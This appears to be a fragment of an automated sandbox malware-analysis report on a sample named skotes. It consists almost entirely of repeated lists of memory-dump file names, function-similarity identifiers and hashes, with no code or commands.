                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                            • String ID: pScheduler
                                                                                                                                                                                            • API String ID: 246774199-923244539
                                                                                                                                                                                            • Opcode ID: 6020995b936509385b134a91cc009de69f06a2f1289a4ea24fa69f436d5fa690
                                                                                                                                                                                            • Instruction ID: 2944328412aaa1a5723f6ee9a6701f6ff358c5611958a2763682e0cc914914fb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6020995b936509385b134a91cc009de69f06a2f1289a4ea24fa69f436d5fa690
                                                                                                                                                                                            • Instruction Fuzzy Hash: DBF05035500A24E3C760FA54FC46CDEB37B9F50724B10C12DE80517281DBB19A19CE95
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __alloca_probe_16__freea
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1635606685-0
                                                                                                                                                                                            • Opcode ID: 104ae292bd021f33e3d3e80dbcb38d7f73e2e7a25c6aeaddd2d19bcaf9b5ac36
                                                                                                                                                                                            • Instruction ID: 5bba5e5260a7dbecab01ffd99eb694547e4af22a3f26694dc59154db4f07f7d5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 104ae292bd021f33e3d3e80dbcb38d7f73e2e7a25c6aeaddd2d19bcaf9b5ac36
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6281CF72D0064A9FDF209FA4C881AEE7BA79F0B314F194159F801B7351D731CC858BA2
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                            • Opcode ID: ad55610a019a0217c31ff93dce2e8faf3f3bf33c62dcfb50df404985261e76d1
                                                                                                                                                                                            • Instruction ID: 43d03015bf874a4c4c33eeae86c754ea29a1cb899672127cdfe28a653228ab1a
                                                                                                                                                                                            • Opcode Fuzzy Hash: ad55610a019a0217c31ff93dce2e8faf3f3bf33c62dcfb50df404985261e76d1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4151CE72601A06AFDB299F54D881BBAB7A7EF10300F14452DE803972A1E732ED81CBD1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
